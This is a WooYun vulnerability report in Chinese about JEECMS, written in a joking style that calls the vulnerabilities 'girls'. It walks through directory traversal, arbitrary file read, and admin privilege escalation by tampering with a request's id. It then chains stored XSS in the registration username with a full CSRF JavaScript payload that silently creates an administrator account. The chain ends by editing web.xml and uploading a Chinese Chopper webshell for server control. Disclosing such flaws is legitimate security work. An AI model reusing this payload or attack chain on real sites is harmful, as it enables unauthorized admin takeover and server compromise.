WooYun.org

我们直接进入主题
1.跨目录，跨权限，跨妹子
到jeecms官网演示站后台，瞧一瞧，目测到跨目录问题
直接浏览服务器根目录

由于家里网速较卡，而且官网演示站，很多功能被限制，我下载到本地搭建环境测试，继续
任意文件下载

任意文件读取

2.这个我也不知道咋回事，我真的不知道，怎么可以修改别人的密码
创建一个res管理员

只能查看管理自己这个账号

拦截数据库包修改
将我自己这个管理员的编号id 8 修改成admin的id 1

发包，尼玛世界末日来了，我看见admin那妹子的账号了

昨天约妹子，和我吃个饭，不刁我的，看我改你密码，嘿嘿

登录一下妹子的账号admin

哈哈，成功进入，这下妹子，肯定要主动请我吃饭了，嘎嘎

好吧，我又在yy了，屌丝伤不起，活跃下气氛
go on........
3.我在思考
我在思考，这些东西的利用条件都要知道后台管理账号密码，利用还是比较困难
于是我想利用前段的留言评论，看能不能xss或者csrf
最后测试了一下，都过滤了，我伤心了
4.奇迹出现，大战即将开始
到前台看了下，到前台，必看注册
我还是在想xss妹子，最近找她太多，她烦我了，今天碰碰运气，看她理我不
这回我才xss妹子藏在注册用户名上

果断burpsuite拦截数据，将xss妹子请出来

奇迹，这次xss妹子，出来见我了

xss妹子，还在后台分身和admin妹子开玩笑

xss妹子说躲在后面给我把admin妹子骗过来，我太兴奋了，看了一下长度100
嘎嘎，天助我泡妹子耶

xss妹子说,光她一个人拿不下admin妹子，叫我喊csrf妹子来帮忙
但是csrf妹子说了叫我摸清后面添加管理员或者，修改管理妹子的基本参数和提交方法(get,post）
于是我去摸摸底
找到了，添加管理的，基本参数，请求方法

于是为了进去后台拿下管理妹子，我写了一个javascript post提交，添加管理

<script type="text/javascript">
	var xmlHttp=null;
	function createXMLHttpRequest(){
	if(window.XMLHttpRequest){
		xmlHttp=new XMLHttpRequest();
	}
	else{
		try{
				xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
				
			}catch(ex){
			
				xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
			}	
		}
	}
	
	function sendRequest(){
		//1.创建请求
		if(xmlHttp==null)
		{
		
			createXMLHttpRequest();
		}
		var data="username=csrf&email=csrf@shack2.org&password=csrf&groupId=1&rank=5&realname=&gender=&selfAdmin=false&viewonlyAdmin=false&roleIds=1&siteIds=1&steps=1&allChannels=true";
		xmlHttp.open("post","/jeeadmin/jeecms/admin_global/o_save.do",true);
		//3.发送请求
		xmlHttp.setRequestHeader("Context-Type","application/x-www-form-urlencoded");
		xmlHttp.send(data);
	
	}
</script>

哎，好久没写javascript，有点生疏了
写好，上传到了我的博客，待会调用
这里我就忽悠管理妹子，说我的密码忘了，还怎么怎么的，让他看会员管理，只要看了，就中招

成功打入妹子内部

5.拿到妹子整个系统控制权（webshell）
前面我们已经知道后台有任意文件下载，任意文件读取
其实这里还有任意文件上传，任意文件修改
由于有人作怪，把所有jsp请求全拦截了
所以我们要修改她的大脑web.xml
这里以前也有基友发过
WooYun: JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell
开始利用模版管理跨目录，修改web.xml

去掉对jsp的过滤器

再就是突破文件上传
这里模版功能很强大，上传jsp文件html后缀，然后改名成jsp后缀
利用跨目录，上传菜刀马儿到根目录

菜刀连接我的妹子

ok，终于控制到了我的妹子了
哎，重8点熬到现在，1点，5个小时
只求妹子，没妹子，求rank